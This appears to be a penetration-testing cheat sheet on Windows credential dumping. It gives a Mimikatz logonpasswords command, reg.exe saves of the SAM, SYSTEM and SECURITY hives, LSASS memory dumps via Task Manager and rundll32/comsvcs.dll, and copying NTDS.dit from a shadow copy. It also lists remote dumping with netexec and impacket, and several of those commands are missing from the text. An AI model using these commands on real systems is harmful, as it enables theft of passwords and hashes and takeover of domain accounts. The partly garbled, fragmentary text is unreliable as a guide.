Credential Dumping
Locally
Mimikatz
Dump all
Output to file with log.\mimikatz.exe "log C:\path\to\mimikatz.log" "privilege::debug" "sekurlsa::logonpasswords" "log" "exit"
Rubeus
Kerberos Tickets
List cached tickets - Non elevated: List current users - Elevated: List everyones
Specify service Dump tickets - Non elevated: dump current users Dump all tickets by targeting krbtgt (Elevated)Alternative Methods
Save SAM and SYSTEM/SECURITY, extract locally
note
we will only need hklm\sam & hklm\system, but hklm\security can also be helpful to save as it can contain hashes associated with cached domain user account credentials present on domain-joined hosts
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
GUI access required
Open Task Manager
> Select the Processes tab
> Find & right click the Local Security Authority Process
> Select Create dump file
**A file called lsass.DMP
is created and saved in:
Rundll32.exe & Comsvcs.dll Method
Will absolutely be flagged by AV/EDR
Get lsass PID
Create dumpfile with rundll32With this command, we are running rundll32.exe
to call an exported function of comsvcs.dll
which also calls the MiniDumpWriteDump (MiniDump
) function to dump the LSASS process memory to a specified directory (C:\lsass.dmp
).
Use Pypykatz to Extract Credentials (on attack box)
NTDS.dit Dumping
(Need DA or local admin on DC) Shadow Copy
Copying NTDS.dit from the VSScmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
Remotely
netexec
LSA (local admin required)
SAM (local admin required) NTDS (DA or local admin on DC required)impacket
Dump everything (local admin required)